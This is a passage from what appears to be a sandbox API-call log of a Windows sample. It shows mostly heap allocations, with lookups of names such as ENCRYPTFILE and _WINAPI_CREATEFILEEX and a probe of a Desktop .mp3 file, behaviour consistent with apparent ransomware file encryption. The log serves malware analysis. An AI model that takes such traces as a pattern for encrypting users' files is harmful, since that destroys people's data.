0 [0123.092] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0123.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0123.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0123.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0123.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0123.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0123.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0123.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0123.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0123.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0123.092] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0123.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0123.092] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0123.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0123.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0123.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0123.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0123.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0123.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0123.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0123.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0123.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0123.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9888 | out: hHeap=0x1780000) returned 1 [0123.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0123.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0123.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0123.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0123.093] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0123.093] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0123.103] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0123.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0123.104] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0123.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0123.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0123.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0123.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0123.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0123.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0123.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0123.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0123.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0123.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0123.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0123.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0123.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0123.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0123.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0123.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0123.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0123.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9ab0 [0123.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0123.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0123.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0123.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0123.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0123.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0123.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0123.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0123.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0123.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0123.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0123.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0123.105] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0123.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0123.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0123.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0123.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0123.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0123.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0123.105] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0123.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0123.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0123.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0123.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0123.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0123.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0123.105] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\I4IMK8uPkmw_W.mp3", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e9bb8c0, ftCreationTime.dwHighDateTime=0x1d5f068, ftLastAccessTime.dwLowDateTime=0xfa80a9c0, ftLastAccessTime.dwHighDateTime=0x1d5eca6, ftLastWriteTime.dwLowDateTime=0xfa80a9c0, ftLastWriteTime.dwHighDateTime=0x1d5eca6, nFileSizeHigh=0x0, nFileSizeLow=0x7f8f, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="I4IMK8uPkmw_W.mp3", cAlternateFileName="I4IMK8~1.MP3")) returned 0x41ac740 [0123.106] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0123.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0123.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0123.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0123.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0123.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0123.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0123.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0123.106] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0123.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0123.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0123.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0123.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22c0 [0123.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0123.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0123.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0123.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0123.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0123.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e60 [0123.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0123.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0123.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0123.107] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0123.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392618 [0123.107] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0123.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392618 | out: hHeap=0x1780000) returned 1 [0123.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0123.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0123.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0123.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2160 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0123.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9b90 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0123.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0123.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0123.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0123.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0123.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0123.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0123.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0123.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0123.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0123.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392228 [0123.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0123.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0123.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0123.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0123.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0123.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0123.110] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0123.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0123.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0123.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0123.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0123.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0123.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0123.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0123.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0123.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0123.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0123.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0123.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0123.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0123.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0123.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0123.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0123.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 